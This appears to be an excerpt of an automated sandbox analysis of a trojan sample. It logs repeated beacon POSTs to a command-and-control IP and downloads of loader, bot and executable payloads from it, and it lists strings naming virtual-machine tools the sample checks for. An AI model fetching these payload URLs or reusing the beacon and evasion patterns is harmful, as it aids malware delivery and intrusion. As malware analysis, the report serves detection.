Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: global traffic HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.140
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe Code function: 0_2_00007FF6CF943240 InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,HeapAlloc,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00007FF6CF943240
Source: global traffic HTTP traffic detected: GET /api/loader.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /api/bot64.bin HTTP/1.1User-Agent: Mozilla/5.0Host: 176.111.174.140Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /x.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: global traffic HTTP traffic detected: GET /zx.exe HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: unknown HTTP traffic detected: POST /GrXRYWt.php?B268D441C1ED2974164258 HTTP/1.1Host: 176.111.174.140Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Source: explorer.exe String found in binary or memory: http://176.111.174.140/api/bot.bin
Source: explorer.exe, 00000003.00000002.3315625714.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3307584261.0000000003350000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3316703810.0000000009820000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://176.111.174.140/api/bot.binchrome.exehttp://176.111.174.140/api/bot.bintrusteerchrome.exeoper
Source: explorer.exe, explorer.exe, 00000003.00000002.3323802541.000000000C669000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/api/bot64.bin
Source: explorer.exe, 00000003.00000002.3315625714.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3307584261.0000000003350000.00000020.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3316703810.0000000009820000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://176.111.174.140/api/bot64.binhttp://176.111.174.140/api/bot64.binCreateProcessInternalWKernel
Source: explorer.exe, 00000003.00000002.3323802541.000000000C669000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://176.111.174.140/api/bot64.binom
Source: svchost.exe String found in binary or memory: http://176.111.174.140/api/loader.bin
Source: SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe String found in binary or memory: http://176.111.174.140/api/loader.binvmware.exevmware-vmx.exevboxservice.exevboxtray.exesvchost.exeM
Source: 7DF0.tmp.zx.exe, 0000000A.00000003.2304137052.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2301103912.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2317567736.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2305426346.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2318809241.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.000002431721D000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2300771207.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2315840998.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317219000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.10.dr, _lzma.pyd.10.dr, libcrypto-1_1.dll.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: explorer.exe, 00000003.00000002.3316980175.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2105614725.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3316980175.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2105614725.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 7DF0.tmp.zx.exe, 0000000A.00000003.2315840998.000002431721D000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2304137052.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2301103912.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2317567736.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2304926255.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2305426346.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2318809241.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.000002431721D000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2321669980.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 0000000A.00000003.2322802000.0000024317210000.00000004.00000020.00020000.00000000.sdmp, 7DF0.tmp.zx.exe, 